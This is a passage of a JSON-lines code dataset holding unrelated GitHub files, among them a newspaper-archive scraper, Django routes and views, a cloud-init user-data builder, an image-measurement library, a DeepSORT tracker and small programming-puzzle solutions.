self.launch_phpstorm, files)\n\n return [item]\n\n def get_background_items(self, window, file_):\n item = Nautilus.MenuItem(\n name='PhpStormOpenBackground',\n label='Open in ' + DISPLAYNAME,\n tip='Opens the current directory in PhpStorm'\n )\n item.connect('activate', self.launch_phpstorm, [file_])\n\n return [item]\n\n","repo_name":"luccui000/my-ubuntu-setup","sub_path":"php-nautilus.py","file_name":"php-nautilus.py","file_ext":"py","file_size_in_byte":1628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"30574269503","text":"from splinter import Browser\nfrom selenium.webdriver.chrome.options import Options\nfrom bs4 import BeautifulSoup\nimport constants\nimport random\nimport time\nimport re\nfrom sqlite3 import Error\nimport sqlite3\n\n\nchrome_options = Options()\nchrome_options.add_extension('ublock_origin.crx')\nbrowser = Browser('chrome', headless=True, chrome_options=chrome_options)\n\n\ndef db_connect():\n try:\n conn = sqlite3.connect('data.db')\n create_table = \"\"\"CREATE TABLE IF NOT EXISTS data (\n ID INTEGER PRIMARY KEY AUTOINCREMENT,\n query TEXT NOT NULL,\n title TEXT NOT NULL,\n text TEXT NOT NULL,\n date_published DATE NOT NULL,\n name TEXT NOT NULL\n );\"\"\"\n conn.execute(create_table)\n return conn\n except Error as e:\n print(e)\n return None\n\n\ndef insert_row(conn, query, title, text, date_published, name):\n cur = conn.cursor()\n cur.execute(\"SELECT 1 FROM data WHERE title = ? AND name = ? AND date_published = ? LIMIT 1\", (title, name, date_published))\n if not cur.fetchone():\n conn.execute(\"INSERT INTO data (query, title, text, date_published, name) VALUES (?, ?, ?, ?, ?);\", (query, title, text, date_published, name))\n conn.commit()\n return True\n\n\ndef slumber(min, max):\n time.sleep(random.randint(min, max))\n\n\ndef login():\n url = 'https://acces-distant.sciencespo.fr/fork?https://www.faz-biblionet.de/faz-portal'\n browser.visit(url)\n slumber(1, 3)\n browser.fill('username', constants.username)\n browser.fill('password', constants.password)\n slumber(1, 3)\n browser.find_by_xpath('/html/body/div/div/div[2]/div[1]/form/div[4]/input[4]').click()\n slumber(5, 15)\n\n\ndef click_button(row):\n buttons = row.find_by_css('.hit-link-button')\n for button in buttons:\n article_text = re.sub(r\"[\\n\\t\\s]*\", \"\", button.text)\n if article_text == 'Artikel':\n button.click()\n return True\n\n\ndef search(conn, name, institution):\n query = f'{name} AND {institution} NOT Interview'\n url = f'https://www-faz-biblionet-de.acces-distant.sciencespo.fr/faz-portal/faz-archiv?q={query}&DT_from={constants.dt_from}&DT_to={constants.dt_to}'\n browser.visit(url)\n slumber(3, 6)\n\n cookies_accept = browser.find_by_css('.cb-enable')\n if cookies_accept:\n cookies_accept.click()\n\n c = 0\n\n rows = browser.find_by_css('.article-row')\n if len(rows):\n row = rows[0]\n if click_button(row):\n slumber(3, 6)\n while True:\n try:\n soup = BeautifulSoup(browser.html, 'lxml')\n if \"The system has detected a very high use of electronic resources\" in soup.text:\n input('DAMN! 
Wait FOR 120mins')\n soup = BeautifulSoup(browser.html, 'lxml')\n\n document = soup.select_one('.single-document')\n\n date_published = soup.select_one('.document-article-infos').select('td')[1].text.strip()\n dd = date_published.split('.')\n day = dd[0]\n month = dd[1]\n year = dd[2]\n date_published = f'{year}-{day}-{month}'\n\n title = document.select_one('pre.docTitle')\n if title:\n title = title.text.strip()\n else:\n title = f'{name} - {institution} - {date_published}'\n\n contents = ''\n for texts in document.select('pre.text'):\n contents += texts.text.strip()\n\n if insert_row(conn, query, title, contents, date_published, name):\n c += 1\n print('count:', c)\n print('name:', name)\n print('title:', title)\n print('date_published:', date_published)\n print('text:', len(contents))\n print('-' * 10)\n except Exception as e:\n print(e)\n\n next_button = browser.find_by_css('a.next-link')\n if next_button:\n next_button.first.click()\n slumber(20, 60)\n else:\n print('No more articles')\n return\n\n\ndef main():\n start_time = time.time()\n\n conn = db_connect()\n login()\n for item in constants.names:\n search(conn, item['name'], item['institution'])\n conn.close()\n\n end_time = (time.time() - start_time)\n print(f'Execution time in minutes: {end_time / 60}')\n browser.quit()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Moritz-Pfeifer/Fiscal-Dominance","sub_path":"Web-Scraping-Tools/scraper-biblionet-main/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":4948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"37553872624","text":"from rest_framework.routers import DefaultRouter\n\nfrom shop.api_v1_views import ShopsViewSet, CategoriesViewSet, ProductViewSet, CreateWithYamlViewSet, ParametersViewSet, \\\n ContactsViewSet, OrdersViewSet, ProductInfoViewSet\n\nrouter = DefaultRouter()\nrouter.register(\"shops\", ShopsViewSet, basename=\"all_shops\")\nrouter.register(\"categories\", CategoriesViewSet, basename=\"all_categories\")\nrouter.register(\"products\", ProductViewSet, basename=\"all_products\")\nrouter.register(\"create-yml\", CreateWithYamlViewSet, basename=\"create_yml\")\nrouter.register(\"parameters\", ParametersViewSet, basename=\"all_parameters\")\nrouter.register(\"contacts\", ContactsViewSet, basename=\"contacts\")\nrouter.register(\"orders\", OrdersViewSet, basename=\"orders\")\nrouter.register(\"product-info\", ProductInfoViewSet, basename=\"product_info\")\n\n\nurlpatterns = [] + router.urls\n","repo_name":"SaD-Pr0gEr/Store-playground-api","sub_path":"shop/api_v1_urls.py","file_name":"api_v1_urls.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"28236425545","text":"import gzip\nimport re\nfrom email import charset, message_from_string\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nfrom StringIO import StringIO\n\nimport yaml\n\n# Load the part handler. 
Note that this is only used on the guest.\n# On metavisor, we handle the parts in the cloudinit handler.\nfile_writer_handler = \"\"\"\n#part-handler\n\nimport os\nimport yaml\nimport pwd\nimport grp\n\n\ndef list_types():\n return [\"text/brkt-files\", \"text/brkt-guest-files\"]\n\n\ndef str2oct(s):\n '''Returns an integer from an octal string.'''\n return int(s, 8)\n\n\ndef output(msg):\n with open('/tmp/file_writer.out', 'a') as fd:\n fd.write('file_writer.handler: %s\\\\n' % (msg,))\n print \"file_writer.handler: %s\" % (msg,)\n\n\ndef handle_part(data, ctype, filename, payload):\n if ctype in ('__begin__', '__end__'):\n return\n\n file_config = yaml.safe_load(payload)\n\n for filename, config in file_config.iteritems():\n output('working on %s' % (filename,))\n file_dir = os.path.dirname(filename)\n if config.get('permissions'):\n file_mask = 0777 - config['permissions']\n dir_mask = 0777 - (config['permissions'] + 0111)\n\n # Use the current user as the owner of the file, unless they specify\n # them\n chowner = [-1, -1]\n if config.get('owner'):\n owner = config['owner']\n if isinstance(owner, str):\n owner = pwd.getpwnam(owner).pw_uid\n chowner[0] = owner\n if config.get('group'):\n group = config['group']\n if isinstance(group, str):\n group = grp.getgrnam(group).gr_gid\n chowner[1] = group\n\n if not os.path.exists(file_dir):\n old_umask = None\n if config.get('permissions'):\n old_umask = os.umask(dir_mask)\n output('creating directory %s' % (file_dir,))\n os.makedirs(file_dir)\n if old_umask is not None:\n os.umask(old_umask)\n os.chown(file_dir, *chowner)\n\n old_umask = None\n if config.get('permissions'):\n old_umask = os.umask(file_mask)\n with open(filename, 'w') as fd:\n output('writing file %s' % (filename,))\n fd.write(config.get('contents', ''))\n if old_umask is not None:\n os.umask(old_umask)\n os.chown(filename, *chowner)\n\"\"\"\n\n\n# Avoid base64 encoding the MIME parts\nUTF8_CHARSET = charset.Charset('utf-8')\nUTF8_CHARSET.body_encoding = None # Python defaults to BASE64\n\n\ndef _new_mime_part(container, content_type, payload):\n # MIMEText will prepend to the content_type\n content_type = re.sub(r'^text/', '', content_type)\n message = MIMEText(payload, content_type, 'utf-8')\n del message['Content-Transfer-Encoding']\n message.set_payload(payload, UTF8_CHARSET)\n container.attach(message)\n\n\ndef get_mime_part_payload(mime_data, part_content_type):\n \"\"\" Return the payload for the part with the specified content-type.\n\n Returns None if a part with the specified content-type is not found.\n \"\"\"\n msg = message_from_string(mime_data)\n\n for part in msg.walk():\n if part.get_content_type() != part_content_type:\n continue\n return part.get_payload(decode=True)\n return None\n\n\nclass UserDataContainer(object):\n def __init__(self):\n self.parts = []\n self.files_config = {}\n self.add_part('text/part-handler', file_writer_handler)\n\n def add_part(self, mimetype, content):\n self.parts.append((mimetype, content))\n\n def add_file(self, filename, content, content_type):\n if content_type not in self.files_config:\n self.files_config[content_type] = {}\n self.files_config[content_type][filename] = {\n 'contents': content,\n }\n\n def to_mime_text(self):\n # These hard coded strings are to avoid having diffs in userdata\n # when nothing changed. 
Without this AWS sees the userdata has changed\n # (the MIME boundary or \"unixfrom\" changed) and it relaunches the\n # instance to give it new data.\n container = MIMEMultipart(boundary='--===============HI-20131203==--')\n container._unixfrom = 'From nobody Tue Dec 3 19:00:57 2013'\n for part in self.parts:\n _new_mime_part(container, part[0], part[1])\n\n if self.files_config:\n for (content_type, files) in self.files_config.iteritems():\n _new_mime_part(container, content_type, yaml.safe_dump(files))\n\n return str(container)\n\n\ndef gzip_user_data(user_data_string):\n out = StringIO()\n with gzip.GzipFile(fileobj=out, mode=\"w\") as f:\n f.write(user_data_string)\n return out.getvalue()\n","repo_name":"patlachance/brkt-cli","sub_path":"brkt_cli/user_data.py","file_name":"user_data.py","file_ext":"py","file_size_in_byte":4760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"51"} +{"seq_id":"12570914570","text":"N, M = map(int, input().split())\r\nS = [list(str(input())) for i in range(N)]\r\n\r\n# print(S)\r\ncount = 0\r\nfor i in range(len(S) - 1):\r\n for j in range(i + 1, len(S)):\r\n # print(S[i], S[j])\r\n # print(i, j)\r\n for k in range(M):\r\n if S[i][k] == \"x\" and S[j][k] == \"x\":\r\n\r\n break\r\n else:\r\n count += 1\r\n\r\nprint(count)\r\n","repo_name":"ridge0321/Atcoder_Submissons","sub_path":"submissions/abc282/abc282_b.py","file_name":"abc282_b.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"71607427678","text":"#!/usr/bin/python \n# -*- coding: utf-8 -*- \n# @Time : 2019/12/19 18:29 \n# @Author : Alisen \n# @File : romanToInt.py\nclass Solution:\n def romanToInt(self, s: str) -> int:\n dic = {\n 'I':1,\n 'V':5,\n 'X':10,\n 'L':50,\n 'C':100,\n 'D':500,\n 'M':1000,\n }\n\n result = 0\n for index,item in enumerate(s[::-1]):\n if item not in dic:\n assert None\n if index <=0:\n result += dic[item]\n continue\n if (item == 'I') and (s[::-1][index-1] == 'V' or s[::-1][index-1] == 'X'):\n result -= dic[item]\n elif (item == 'X') and (s[::-1][index-1] == 'L' or s[::-1][index-1] == 'C'):\n result -= dic[item]\n elif (item == 'C') and (s[::-1][index -1] == 'D' or s[::-1][index-1] == 'M'):\n result -= dic[item]\n else:\n result += dic[item]\n return result\n\nif __name__ == '__main__':\n res = Solution().romanToInt(\"IVVIX\")\n print(res)","repo_name":"alisen39/algorithm","sub_path":"algorithms/romanToInt.py","file_name":"romanToInt.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"1002206426","text":"\"\"\"\r\nThis module provides a set of functions which perform measure\r\noperations on mamba images. It works with imageMb instances as defined in mamba.\r\n\"\"\"\r\n\r\n# Contributors: Serge BEUCHER, Nicolas BEUCHER\r\n\r\nfrom __future__ import division\r\n\r\nfrom mambaIm.mambaCore import ERR_BAD_DEPTH\r\nfrom mambaIm import mamba\r\nimport math\r\n\r\ndef computeArea(imIn, scale=(1.0, 1.0)):\r\n \"\"\"\r\n Calculates the area of the binary image 'imIn'. 'scale' is a tuple \r\n containing the horizontal scale factor (distance between two adjacent \r\n horizontal points) and the vertical scale factor (distance between two \r\n successive lines) of image 'imIn' (default is 1.0 for both).
The result is\r\n a float (when default values are used, the result value is identical to the\r\n computeVolume operator).\r\n \r\n Note that, with hexagonal grid, the 'scale' default values do not correspond\r\n to an isotropic grid (where triangles would be equilateral).\r\n \r\n Beware, if the input image 'imIn' is not a binary image, the function raises\r\n an error.\r\n \"\"\"\r\n \r\n if imIn.getDepth() != 1:\r\n mamba.raiseExceptionOnError(ERR_BAD_DEPTH)\r\n a = scale[0]*scale[1]*mamba.computeVolume(imIn)\r\n return a\r\n\r\ndef computeDiameter(imIn, dir, scale=(1.0, 1.0), grid=mamba.DEFAULT_GRID):\r\n \"\"\"\r\n Computes the diameter (diametral variation) of binary image 'imIn' in \r\n direction 'dir'. 'scale' is a tuple defining the horizontal and vertical\r\n scale factors (default is 1.0).\r\n \r\n Beware, if the input image 'imIn' is not a binary image, the function raises\r\n an error.\r\n \"\"\"\r\n \r\n if imIn.getDepth() != 1:\r\n mamba.raiseExceptionOnError(ERR_BAD_DEPTH)\r\n if dir == 0:\r\n return 0.0\r\n dir = ((dir - 1)%(mamba.gridNeighbors(grid)//2)) +1\r\n imWrk = mamba.imageMb(imIn)\r\n mamba.copy(imIn, imWrk)\r\n mamba.diffNeighbor(imIn, imWrk, dir, grid=grid)\r\n if grid == mamba.HEXAGONAL:\r\n l = scale[1]\r\n if dir != 2:\r\n l = 2*l*scale[0]/math.sqrt(scale[0]*scale[0] + 4*scale[1]*scale[1])\r\n else:\r\n if dir == 1:\r\n l = scale[0]\r\n elif dir == 3:\r\n l = scale[1]\r\n else:\r\n l = scale[0]*scale[1]/math.sqrt(scale[0]*scale[0] + scale[1]*scale[1])\r\n l = l*mamba.computeVolume(imWrk)\r\n return l\r\n\r\ndef computePerimeter(imIn, scale=(1.0, 1.0), grid=mamba.DEFAULT_GRID):\r\n \"\"\"\r\n Computes the perimeter of all particles in binary image 'imIn' according\r\n to the Cauchy-Crofton formula. 'scale' is a tuple defining the horizontal\r\n and vertical scale factors (default is 1.0).\r\n \r\n The edge of the image is always set to 'EMPTY'.\r\n \r\n Beware, if the input image 'imIn' is not a binary image, the function raises\r\n an error.\r\n \"\"\"\r\n \r\n if imIn.getDepth() != 1:\r\n mamba.raiseExceptionOnError(ERR_BAD_DEPTH)\r\n p = 0.\r\n for i in range(1, mamba.gridNeighbors(grid)//2 + 1):\r\n p += computeDiameter(imIn, i, scale=scale, grid=grid)\r\n p = 2*math.pi*p/mamba.gridNeighbors(grid)\r\n return p\r\n \r\ndef computeConnectivityNumber(imIn, grid=mamba.DEFAULT_GRID):\r\n \"\"\"\r\n Computes the connectivity number (Euler_Poincare constant) of image 'imIn'.\r\n The result is an integer number.\r\n \r\n Beware, if the input image 'imIn' is not a binary image, the function raises\r\n an error.\r\n \"\"\"\r\n \r\n if imIn.getDepth() != 1:\r\n mamba.raiseExceptionOnError(ERR_BAD_DEPTH)\r\n imWrk = mamba.imageMb(imIn)\r\n if grid == mamba.HEXAGONAL:\r\n mamba.hitOrMiss(imIn, imWrk, 66, 1, grid=grid)\r\n n = mamba.computeVolume(imWrk)\r\n mamba.hitOrMiss(imIn, imWrk, 2, 5, grid=grid)\r\n n = n - mamba.computeVolume(imWrk) \r\n else:\r\n mamba.hitOrMiss(imIn, imWrk, 56, 1, grid=grid)\r\n n = mamba.computeVolume(imWrk)\r\n mamba.hitOrMiss(imIn, imWrk, 16, 41, grid=grid)\r\n n = n - mamba.computeVolume(imWrk)\r\n mamba.hitOrMiss(imIn, imWrk, 40, 17, grid=grid)\r\n n = n + mamba.computeVolume(imWrk)\r\n return n\r\n\r\ndef computeComponentsNumber(imIn, grid=mamba.DEFAULT_GRID):\r\n \"\"\"\r\n Computes the number of connected components in image 'imIn'.
The result is\r\n an integer value.\r\n \"\"\"\r\n \r\n imWrk = mamba.imageMb(imIn, 32)\r\n return mamba.label(imIn, imWrk, grid=grid)\r\n \r\n\r\ndef computeFeretDiameters(imIn, scale=(1.0, 1.0)):\r\n \"\"\"\r\n computes the global Feret diameters (horizontal and vertical) of binary \r\n image 'imIn' and returns the result in a tuple (hDf, vDf). These diameters \r\n correspond to the horizontal and vertical dimensions of the smallest \r\n bounding box containing all the particles of 'imIn'\r\n \"\"\"\r\n \r\n s = mamba.extractFrame(imIn, 1)\r\n return (scale[0]*(s[2]-s[0]), scale[1]*(s[3]-s[1]))\r\n\r\n","repo_name":"FabriceSalvaire/mamba-image","sub_path":"src/mambaApi/python/mambaComposed/measure.py","file_name":"measure.py","file_ext":"py","file_size_in_byte":4799,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"26209303423","text":"from django.conf.urls import url\n\nfrom bootcamp.projects import views\n\nurlpatterns = [\n url(r'^$', views.projects, name='projects'),\n url(r'^connect_repository', views.connect_repository, name='connect_repository'),\n url(r'^access_repository', views.access_repository, name='access_repository'),\n url(r'^dropbox_auth_start', views.dropbox_auth_start, name='dropbox_auth_start'),\n url(r'^dropbox_auth_finish', views.dropbox_auth_finish, name='dropbox_auth_finish'),\n url(r'^search/$', views.search_projects, name='search_projects'),\n url(r'^write/$', views.write, name='write'),\n url(r'^preview/$', views.preview, name='preview'),\n url(r'^drafts/$', views.drafts, name='drafts'),\n url(r'^comment/$', views.comment, name='comment'),\n url(r'^tag/(?P.+)/$', views.tag, name='tag'),\n url(r'^author/(?P.+)/$', views.author, name='author'),\n url(r'^edit/(?P\\d+)/$', views.edit, name='edit_project'),\n url(r'^collaborator_lookup/$', views.collaborator_lookup, name='collaborator_lookup'),\n url(r'^(?P[-\\w]+)/$', views.project, name='project'),\n]\n","repo_name":"braindeadpool/pharos","sub_path":"bootcamp/projects/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"51"} +{"seq_id":"34468499187","text":"from django.http import HttpResponse\nfrom django.shortcuts import render\n\nfrom Plata import models\n\n\ndef index(request):\n try:\n data = models.Data.objects.all()[0].string\n\n finally:\n return render(request, \"index.html\",\n {\"data\": list(data)})\n\n\ndef send(request, string):\n models.Data.objects.all().delete()\n data = models.Data()\n data.string = string\n data.save()\n return HttpResponse(status=201)\n","repo_name":"khokhlovn/PlataTest","sub_path":"Plata/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"27840874499","text":"import sys, os\nsys.stdin = open(f'{os.path.dirname(os.path.realpath(__file__))}/input.txt', \"rt\")\n\ndef DFS(L, s, sum):\n global cnt\n if L == k:\n if sum % m == 0:\n cnt += 1\n else:\n for i in range(s, n):\n DFS(L+1, i+1, sum + a[i])\n \n\nif __name__ == \"__main__\":\n n, k = map(int, input().split())\n a = list(map(int, input().split()))\n m = int(input())\n sum = 0\n cnt = 0\n DFS(0, 0, 0)\n print(cnt)\n","repo_name":"what-is-cote/teamble-developer","sub_path":"sophia/Section6/11.
수들의 조합/my.py","file_name":"my.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"8717398185","text":"import numpy as np\nimport torch\nfrom PIL import Image\nfrom .deep.extractor import Extractorv3\nfrom .deep.extractor import Extractorv3_try_ad\nfrom .deep.extractor import ModelExtractor\nfrom .sort.nn_matching import NearestNeighborDistanceMetric\nfrom .sort.preprocessing import non_max_suppression\nfrom .sort.detection import Detection\nfrom .sort.tracker import Tracker\n\n__all__ = ['DeepSortFace']\n\n\nclass DeepSortFace(object):\n def __init__(self, model_path, max_dist=0.2, min_confidence=0.3, nms_max_overlap=1.0, max_iou_distance=0.7,\n max_age=70, n_init=3, nn_budget=100, use_cuda=True):\n self.min_confidence = min_confidence\n self.nms_max_overlap = nms_max_overlap\n\n # ************************* face embedding *************************\n \n\n ## reid model\n #reid_model_path=r'D:\\openVINO\\working_code_deep_sort\\DeepSORT_Object-master\\deep_sort\\deep\\person-reidentification-retail-0287.xml'\n self.extractor = ModelExtractor(use_cuda=use_cuda)\n\n #print(\"model loaded\",self.extractor)\n #print('Extractor is loading -->>',self.extractor)\n \n #self.extractor = Extractorv3(use_cuda=use_cuda)\n #self.extractor =Extractorv3_try_ad(use_cuda=use_cuda)\n # ******************************************************************\n max_cosine_distance = max_dist\n nn_budget = 100\n metric = NearestNeighborDistanceMetric(\"cosine\", max_cosine_distance, nn_budget)\n\n # tracker maintain a list contains(self.tracks) for each Track object\n self.tracker = Tracker(metric, max_iou_distance=max_iou_distance, max_age=max_age, n_init=n_init)\n\n def update(self, bbox_xywh, confidences,classes, ori_img):\n # bbox_xywh (#obj,4), [xc,yc, w, h] bounding box for each person\n # conf (#obj,1)\n\n self.height, self.width = ori_img.shape[:2]\n\n # get appearance feature with neural network (Deep) *********************************************************\n features = self._get_features(bbox_xywh, ori_img)\n\n bbox_tlwh = self._xywh_to_tlwh(bbox_xywh) # # [cx,cy,w,h] -> [x1,y1,w,h] top left\n\n # generate detections class object for each person *********************************************************\n # filter object with less confidence\n # each Detection obj maintain the location(bbox_tlwh), confidence(conf), and appearance feature\n detections = [Detection(bbox_tlwh[i], conf, features[i]) for i, conf in enumerate(confidences) if\n conf > self.min_confidence]\n\n # run on non-maximum supression (useless) *******************************************************************\n boxes = np.array([d.tlwh for d in detections])\n scores = np.array([d.confidence for d in detections])\n indices = non_max_suppression(boxes, self.nms_max_overlap, scores) # Here, nms_max_overlap is 1\n detections = [detections[i] for i in indices]\n\n # update tracker ********************************************************************************************\n self.tracker.predict() # predict based on t-1 info\n # for first frame, this function do nothing\n\n # detections is the measurement results as time T\n self.tracker.update(detections, classes, confidences)\n \n # output bbox identities ************************************************************************************\n # output bbox identities\n outputs = []\n for track in self.tracker.tracks:\n if not track.is_confirmed() or track.time_since_update > 0:\n continue\n\n 
box = track.to_tlwh()\n x1, y1, x2, y2 = self._tlwh_to_xyxy(box)\n \n track_id = track.track_id\n class_id = track.class_id\n conf = track.conf\n outputs.append(np.array([x1, y1, x2, y2, track_id, class_id, conf]))\n if len(outputs) > 0:\n outputs = np.stack(outputs, axis=0)\n return outputs\n\n \"\"\"\n TODO:\n Convert bbox from xc_yc_w_h to xtl_ytl_w_h\n Thanks JieChen91@github.com for reporting this bug!\n \"\"\"\n\n \nclass DeepSortFaceSingle(object):\n def __init__(self, model_path, max_dist=0.2, min_confidence=0.3, nms_max_overlap=1.0, max_iou_distance=0.7,\n max_age=70, n_init=3, nn_budget=100, use_cuda=True):\n self.min_confidence = min_confidence\n self.nms_max_overlap = nms_max_overlap\n self.trackers = {}\n self.extractors = {}\n\n # create a tracker and re-identification model for each class\n for i in range(51):\n metric = NearestNeighborDistanceMetric(\"cosine\", max_dist, nn_budget)\n tracker = Tracker(metric, max_iou_distance=max_iou_distance, max_age=max_age, n_init=n_init)\n self.trackers[i] = tracker\n self.extractors[i] = ModelExtractor(use_cuda=use_cuda)\n\n def update(self, bbox_xywh, confidences, classes, ori_img):\n self.height, self.width = ori_img.shape[:2]\n outputs = []\n\n\n #classes= []\n #for i in range(1, len(classes) + 1):\n #classes=['']\n for i in range(51):\n tracker = self.trackers[i]\n extractor = self.extractors[i]\n\n # filter detections by class\n class_mask = (classes == i)\n class_bbox_xywh = bbox_xywh[class_mask]\n class_confidences = confidences[class_mask]\n\n if len(class_bbox_xywh) == 0:\n continue\n\n # get appearance feature with neural network\n features = self._get_features(class_bbox_xywh, ori_img)\n\n bbox_tlwh = self._xywh_to_tlwh(class_bbox_xywh)\n\n # generate detections for this class\n detections = [Detection(bbox_tlwh[j], conf, features[j]) for j, conf in enumerate(class_confidences) if\n conf > self.min_confidence]\n\n # run non-maximum suppression\n boxes = np.array([d.tlwh for d in detections])\n scores = np.array([d.confidence for d in detections])\n indices = non_max_suppression(boxes, self.nms_max_overlap, scores)\n detections = [detections[j] for j in indices]\n\n # update tracker\n tracker.predict()\n tracker.update(detections)\n\n # output bbox identities\n for track in tracker.tracks:\n if not track.is_confirmed() or track.time_since_update > 1:\n continue\n\n box = track.to_tlwh()\n x1, y1, x2, y2 = self._tlwh_to_xyxy(box)\n\n track_id = track.track_id\n class_id = i\n conf = track.confidence\n outputs.append(np.array([x1, y1, x2, y2, track_id, class_id, conf]))\n\n if len(outputs) > 0:\n outputs = np.stack(outputs, axis=0)\n return outputs\n\n\n \n @staticmethod\n def _xywh_to_tlwh(bbox_xywh):\n if isinstance(bbox_xywh, np.ndarray):\n bbox_tlwh = bbox_xywh.copy()\n elif isinstance(bbox_xywh, torch.Tensor):\n bbox_tlwh = bbox_xywh.clone()\n bbox_tlwh[:, 0] = bbox_xywh[:, 0] - bbox_xywh[:, 2] / 2.\n bbox_tlwh[:, 1] = bbox_xywh[:, 1] - bbox_xywh[:, 3] / 2.\n return bbox_tlwh\n\n def _xywh_to_xyxy(self, bbox_xywh):\n x, y, w, h = bbox_xywh # xc, yc, w, h\n x1 = max(int(x - w / 2), 0)\n x2 = min(int(x + w / 2), self.width - 1)\n y1 = max(int(y - h / 2), 0)\n y2 = min(int(y + h / 2), self.height - 1)\n return x1, y1, x2, y2\n\n def _tlwh_to_xyxy(self, bbox_tlwh):\n \"\"\"\n TODO:\n Convert bbox from xtl_ytl_w_h to xc_yc_w_h\n Thanks JieChen91@github.com for reporting this bug!\n \"\"\"\n x, y, w, h = bbox_tlwh\n x1 = max(int(x), 0)\n x2 = min(int(x + w), self.width - 1)\n y1 = max(int(y), 0)\n y2 = min(int(y + h), 
self.height - 1)\n return x1, y1, x2, y2\n\n def _xyxy_to_tlwh(self, bbox_xyxy):\n x1, y1, x2, y2 = bbox_xyxy\n\n t = x1\n l = y1\n w = int(x2 - x1)\n h = int(y2 - y1)\n return t, l, w, h\n\n def _get_features(self, bbox_xywh, ori_img):\n \"\"\"\n :param bbox_xywh:\n :param ori_img: cv2 array (h,w,3)\n :return:\n \"\"\"\n im_crops = []\n for box in bbox_xywh:\n x1, y1, x2, y2 = self._xywh_to_xyxy(box)\n im = ori_img[y1:y2, x1:x2]\n #data = Image .fromarray(im)\n im_crops.append(im)\n if im_crops:\n # features = self.extractor.get_features(im_crops)\n features = self.extractor(im_crops)\n else:\n features = np.array([])\n return features\n\n\n\n\n\n","repo_name":"akashAD98/yolov7_vino_with_object_tracking","sub_path":"deep_sort/deep_sort_object.py","file_name":"deep_sort_object.py","file_ext":"py","file_size_in_byte":8768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"12898865925","text":"\"\"\"\nFormula:\nhttps://math.hmc.edu/funfacts/fibonacci-number-formula/\n\"\"\"\nfrom __future__ import annotations\nimport math\n\n\nsqrt_from_5 = math.sqrt(5)\nPhi_n = (1 + sqrt_from_5) / 2\nphi_n = (1 - sqrt_from_5) / 2\n\n\ndef fib(n: int) -> int:\n \"\"\"\n This implementation is a lot faster than\n the one below because of the formula above.\n \"\"\"\n return int((math.pow(Phi_n, n) - math.pow(phi_n, n)) / sqrt_from_5)\n\n\ndef nobby_fib(n: int) -> int:\n if n == 0:\n return 1\n elif n == 1:\n return 2\n else:\n return nobby_fib(n-1) + nobby_fib(n-2)\n\n\ndef main() -> int:\n\n FIB_LIMIT: int = 4000000\n\n even_fib_sum = 0\n n = 0\n fib_n = fib(n)\n\n while fib_n <= FIB_LIMIT:\n \n if fib_n % 2 == 0:\n print(f\"+[{n}] {fib_n}\")\n even_fib_sum += fib_n\n else:\n print(f\"-[{n}] {fib_n}\") \n \n n += 1\n fib_n = fib(n)\n\n print(f\"Answer: {even_fib_sum}\")\n\n return 0\n\n\nif __name__ == \"__main__\":\n raise SystemExit(main())\n","repo_name":"gr3yknigh1/project-euler-solutions","sub_path":"py/solution-02.py","file_name":"solution-02.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"12492643760","text":"import sys\n\nl_to_int = lambda l: list(map(lambda s: int(s), l))\nl_to_str = lambda l: list(map(lambda s: str(s), l))\n\n\ndef get_first_suitable_n(low):\n n_as_l = l_to_int(list(str(low)))\n min_n = None\n has_dup = False\n for i in range(len(n_as_l)):\n if min_n is None or n_as_l[i] > min_n:\n min_n = n_as_l[i]\n elif n_as_l[i] < min_n:\n n_as_l[i] = min_n\n if i > 0:\n if n_as_l[i] == n_as_l[i - 1]:\n has_dup = True\n if not has_dup:\n n_as_l[-2] = n_as_l[-1]\n return int(''.join(l_to_str(n_as_l)))\n\n\ndef generate(low, high):\n while True:\n low = get_first_suitable_n(low)\n if low < high:\n yield low\n else:\n return\n low += 1\n\n\nif __name__ == '__main__':\n lower, upper = 146810, 612564\n # lower, upper = int(sys.argv[1]), int(sys.argv[2])\n ns = list(generate(lower, upper))\n\n print(len(ns))\n","repo_name":"AbelPelser/AdventOfCode2019","sub_path":"Day4/day4_part1.py","file_name":"day4_part1.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"16600792893","text":"from calendar import c\nfrom django.contrib import admin\nfrom django.urls import path\nfrom pedia_app import views\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('', views.index, name='index'),\n path('register/', views.register_req, name='register'),\n
